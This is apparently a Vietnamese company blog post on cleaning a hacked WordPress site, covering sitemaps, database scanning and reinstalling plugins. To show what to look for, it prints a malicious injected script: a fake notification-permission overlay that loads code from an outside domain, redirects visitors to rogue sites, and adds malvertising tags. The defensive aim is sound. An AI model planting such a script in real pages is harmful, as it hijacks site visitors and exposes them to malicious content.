Tivago.vn

HOTLINE
0397 197 791

HOTLINE
0963 64 24 26

Cách sửa lỗi website WordPress bị hack - Phần 3


  07/09/2021 13 lượt xem

7. Làm sạch sơ đồ trang web

Một nguyên nhân khác của việc hack WordPress có thể là do các tập lệnh độc hại đang cư trú trong sitemap.xml của trang web của bạn. Sơ đồ trang XML là một tệp giúp Google thu thập dữ liệu tất cả các trang quan trọng trên trang web của bạn. Đôi khi, tin tặc đưa các liên kết độc hại vào sơ đồ trang web của bạn. Quét sơ đồ trang web của bạn để tìm các liên kết độc hại. Nếu bạn tìm thấy bất kỳ điều gì khác với bình thường, hãy loại bỏ nó.

8. Làm sạch cơ sở dữ liệu

Cơ sở dữ liệu WordPress là nơi chứa tất cả thông tin liên quan đến người dùng, trang web, thông tin đăng nhập nhạy cảm, v.v. của bạn. Không có gì phải bàn cãi khi cơ sở dữ liệu tạo ra một mục tiêu mong muốn. Do đó, việc quét cơ sở dữ liệu cũng cực kỳ quan trọng để tìm ra bản hack. Bạn có thể sử dụng trình quét phần mềm độc hại để biết chính xác hơn về các nhiễm trùng trong tệp wp_db của mình.

Nếu bạn muốn kiểm tra theo cách thủ công, bạn sẽ cần phải quét từng bảng trong số 11 bảng để tìm ra bản hack. Tìm kiếm các liên kết / iframe có vẻ đáng ngờ và xóa chúng để thoát khỏi vụ hack trang web WordPress. Đây là một ví dụ về mã chuyển hướng được chèn vào cơ sở dữ liệu:

 

<script>
const overlayTranslations = {"en":{"title":"Attention!","description":"Click “Allow” to subscribe to notifications and continue working with this website."}};
const overlay = {"delay":3000,"overlayStyle":{"background":"rgba(0,0,0, 0.6)"},"title":"Attention!","description":"Click “Allow” to subscribe to notifications and continue working with this website.",...(overlayTranslations[navigator.language.slice(0, 2).toLowerCase()]||Object.values(overlayTranslations)[0])};
const s = document.createElement('script');
s.src='//humsoolt.net/pfe/current/tag.min.js?z=2774009';
s.onload = (sdk) => {
sdk.updateOptions({overlay, overlayTranslations})
sdk.onPermissionDefault(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onPermissionAllowed(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onPermissionDenied(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onAlreadySubscribed(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onNotificationUnsupported(() => {});
}
document.head.appendChild(s);
</script>
<script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=2574011" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script>

 

9. Cài đặt lại

Nếu trang web bị nhiễm nặng, tốt hơn hết bạn nên xóa các tệp và thay thế tệp đó bằng các tệp đối chiếu mới. Điều đó nói rằng, việc cài đặt lại không chỉ giới hạn ở các tệp; sau khi dọn dẹp, hãy đảm bảo cài đặt lại từng plugin. Đôi khi do thiếu thời gian hoặc thiếu cảnh giác, chúng ta có xu hướng lưu trữ các plugin không còn tồn tại. Một hacker được hưởng lợi từ các plugin này vì chúng hầu như luôn có các lỗ hổng có thể khai thác được.

Một số chủ sở hữu web WordPress tin rằng xóa toàn bộ trang web và bắt đầu lại từ đầu là một lựa chọn khả thi hơn.

Chà, không phải vậy.

 

Cách bảo vệ website WP

 

CÔNG TY TNHH TIVAGO

Website kết nối các doanh nghiệp trong lĩnh vực điện tử, gia dụng, quà tặng ... với giá tiết kiệm và chất lượng.


 160/80/11 đường 1, P.Long Trường, Q.9, TP.HCM
 0397 197 791 - 0963 64 24 26  
 facebook.com/tivagovn
 support247@tivago.vn
 https://tivago.vn 


    Mon [08:00 - 17:00]
    Tue [08:00 - 17:00]
    Wed [08:00 - 17:00]
    Thu [08:00 - 17:00]
    Fri [08:00 - 17:00]
    Sat [08:00 - 17:00]
    Sun [ OFF ]

Tivago.vn - Thiết kế bởi Webdeponline.vn

  MENU